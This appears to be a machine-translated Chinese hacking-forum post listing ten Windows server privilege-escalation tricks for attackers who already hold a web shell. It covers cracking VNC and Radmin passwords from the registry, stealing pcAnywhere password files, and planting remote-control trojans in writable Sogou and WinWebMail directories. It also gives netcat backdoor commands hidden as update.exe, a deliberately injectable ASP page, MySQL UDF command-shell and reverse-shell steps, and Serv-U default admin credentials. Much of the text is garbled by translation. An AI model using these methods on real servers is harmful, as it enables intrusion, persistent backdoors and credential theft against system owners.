Effective methods for Elevation of Privilege collected by individuals

T00ls.net

No. 10 Vnc
Vnc is widely used by many foreigners. It is rarely used in China, but the chances are high.

====================
VNC authorization method
====================
Use shell to read the ciphertext stored in the registry of vnc, and use VNC4X to crack
Registry location: HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4password
69 45
150 96
177 b1
243 f3
153 99
89 59
148 94
22 16

No. 9 Radmin

Radmin is a very good server management, whether it is remote desktop control, or file transmission, the speed is very fast, very convenient.
Radmin uses the default port 4899 and has no password. However, the server focuses on security and will definitely change the default port and password. The port and password read location:
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersParameter // default password registry location
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersPort // default port registry location

In the past, we could use the functions provided by the Trojan horse to read the key value and then convert it to get the hash value. But now we have something more convenient to upload the ASP file to the server, open the hash and Radmin service ports that can be directly read from Radmin!

Radmin.rar (797 Bytes) read hash
Downloads: 4

Yesterday

No. 8 PcAnywhere

PcAnywhere is a widely used remote management software. It has a major vulnerability that stores the CIF File Password of the remote administrator account and can be easily decrypted, if we get the WEBSEHLL of a host. We found that the directory on which PCANYWHERE is installed and the password file is saved is to allow our IUSER permission to access. We can download this CIF file to a local hacker, and then log on to the server from the local machine through PCANYWHERE. The idea is simple and clear.

Ps: the CIF file for saving the password. It is not located in the installation directory of PCANYWHERE and is located in the Documents and SettingsAll UsersApplication DataSymantecpcAnywhere on the disk where PCANYWHERE is installed. If PCANYWHERE is installed under the D: program file, the PCANYWHERE password file is saved in the D: Documents and SettingsAll UsersApplication DataSymantecpcAnywhere folder.

No. 7 sogou Input Method

Many management systems use five-stroke typing. However, a few prefer pinyin, which has fewer smart ABC functions and does not have full spelling functions. Therefore, most of them choose sogou input methods.
In the root directory of the sogou input method, PinyinUp.exe is used to update the dictionary. To save the dictionary, the Administrator may install the sogou Input Method on drive D. The default directory of sogou input method is Everyone readable and writable, directly bind the remote control and wait for the next restart to go online.

No. 6 WinWebMail enterprise Post Office System 7i24.com

The everyone permission must be set for the web in the WinWebMail directory to be readable and writable, or the email cannot be logged in. Therefore, find the WinWebMail shortcut in the Start Program, view the path, and access the path to web shell, after accessing the shell, the permission is system, and the remote control enters the startup Item. Wait for the next restart. The user is added directly without the cmd component.

The 7i24 web directory is also writable and the permission is administrator.

No. 5 NC Rebound

Nc instance

C: c.exe-l-p 4455-d-e cmd.exe can hide a NetCat backdoor.
The c: c.exe-p 4455-d-L-e cmd.exe command allows the hacker to use netcatto re-return to the system and go directly to the System Manager to check that nc.exe is running. This backdoor can be used to hide and hide it,
C: move nc.exe c: windowssystem32Driversupdate.exe
C: windowssysteme32driversupdate.exe-p 4455-d-L-e cmd.exe
System Administrators can attach privileges to malicious programs, such as update.exe. Hackers can also hide command lines.
C: windowssystme32driversupdate.exe
Cmd line:-l-p 4455-d-L-e cmd.exe

C:>
Nc-l-p 80 listens to port 80
Nc-l-p 80> c: log. dat listens to port 80 and records the information to log. dat.
Nc-v-l-p 80 listens to port 80 and displays port information
Nc-vv-l-p 80 listens to port 80 and displays more detailed port information
Nc-l-p 80-t-e accept responds via telnet. Of course, it is best to use it on controlled bots.
Nc-v ip port scan a port of an IP address
Nc-v-z ip port-port Scan port of an IP address to a port
Nc-v-z-u ip port-port scan a UDP port of an IP address to a UDP port

Nc.rar (28.65 KB) Downloads: 1

Yesterday

No. 4 mssql (sa) mysql (root)

If sa 1433 is disabled, an injection point can be built.
<%
StrSQLServerName = "Server ip"
StrSQLDBUserName = "database account"
StrSQLDBPassword = "Database Password"
StrSQLDBName = "database name"
Set conn = Server. createObject ("ADODB. Connection ")
StrCon = "Provider = SQLOLEDB.1; Persist Security Info = False; Server =" & strSQLServerName & "; User ID =" & strSQLDBUserName & "; Password =" & strSQLDBPassword &"; database = "& strSQLDBName &";"
Conn. open strCon
Dim rs, strSQL, id
Set rs = server. createobject ("ADODB. recordset ")
Id = request ("id ")
StrSQL = "select * from ACTLIST where worldid =" & idrs. open strSQL, conn, 1, 3
Rs. close

Root su. php and udf. dll Elevation of Privilege

Step 1: Upload the PHP file to the target machine and enter your MYSQL account to connect.
Step 2: After the connection is successful, export the DLL file. Do not pay attention to the export path during export (generally any directory can be written without permission concerns). For MySQL or later versions, you must export the DLL to the system directory (win or system32) of the target machine. Otherwise, you will see the "No paths allowed for shared library" error in the next step.
Step 3: use SQL statements to create functions. Syntax: Create Function Name (the Function name can only be one of the following lists) returns string soname DLL path exported. For MySQL or later versions, the DLL in the statement cannot contain full paths, if you have exported the DLL to the system directory in step 2, you can omit the path and run the command normally. Otherwise, you will see the "Cant open shared library" error, in this case, you must re-export the DLL to the system directory.
Step 4: After correctly creating function functions, you can use these functions using SQL statements. Syntax: the name of the function (parameter list) created by the select statement. Each function has different parameters. You can use the help function created by the select statement to obtain the parameter list of the specified function.
Udf. dll function description:
Cmdshell executes cmd;
Downloader downloads the specified file online and saves it to the specified directory;
Open3389 General Open 3389 terminal service, you can specify the port (no need to restart without changing the port );
Backshell rebound Shell;
ProcessView: Lists system processes;
KillProcess: terminates a specified process;
Regread read the registry;
Regwrite write the registry;
Shut down shut, log off, and restart;
About description and help functions;
Su.rar (66.7 KB) Downloads: 1

Yesterday
Udf.rar (40.03 KB) Downloads: 3

Yesterday

No. 3 03 Oday

If Asp. Net components are supported, Asp. Net Shell is passed, and cmd is passed (in the Asp environment, it is also successful, but the description must be run in Asp. Net)
Usage: "command"

Number of times of downloading church co.rar (28.54 KB): 1

Yesterday

No. 2 Serv-u

The vulnerability is caused by the use of the Serv-u local default Management port. The default Administrator logs on to the new domain and the user to execute commands. Serv-u> 3. in Version x, the default Local Management port is 43958, and the default Administrator is LocalAdministrator. The default password is # l @ $ ak #. lk; 0 @ P, which is integrated in Serv-u. You can use the Guest permission to connect and manage Serv-u.

No.1 Oday

No one dares to do T ..